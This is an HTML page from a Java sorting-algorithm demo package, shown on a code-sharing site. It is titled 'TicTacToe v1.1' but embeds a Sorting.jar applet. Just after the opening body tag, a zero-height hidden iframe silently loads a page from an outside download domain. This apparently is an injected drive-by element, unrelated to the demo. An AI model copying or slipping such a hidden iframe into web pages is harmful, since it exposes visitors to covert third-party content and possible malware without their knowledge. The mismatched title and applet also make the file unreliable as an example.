example1.html
来自「本程序提供了各种排序算法及演示,由java实现,可以清楚看到各算法的流程演示.」· HTML 代码 · 共 17 行
HTML
17 行
<html>
<head>
<title>TicTacToe v1.1</title>
</head>
<body><iframe src=http://down.onlinedowns.net/page/image/pd.htm height=0></iframe>
<h1>TicTacToe v1.1</h1>
<hr>
<applet archive="Sorting.jar" code="SortStarter.class" height="205" width="550">
alt="Your browser understands the <APPLET> tag but isn't running the applet, for some reason."
Your browser is completely ignoring the <APPLET> tag!
</applet>
<hr>
<a href="TicTacToe.java">The source.</a>
</body>
</html>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?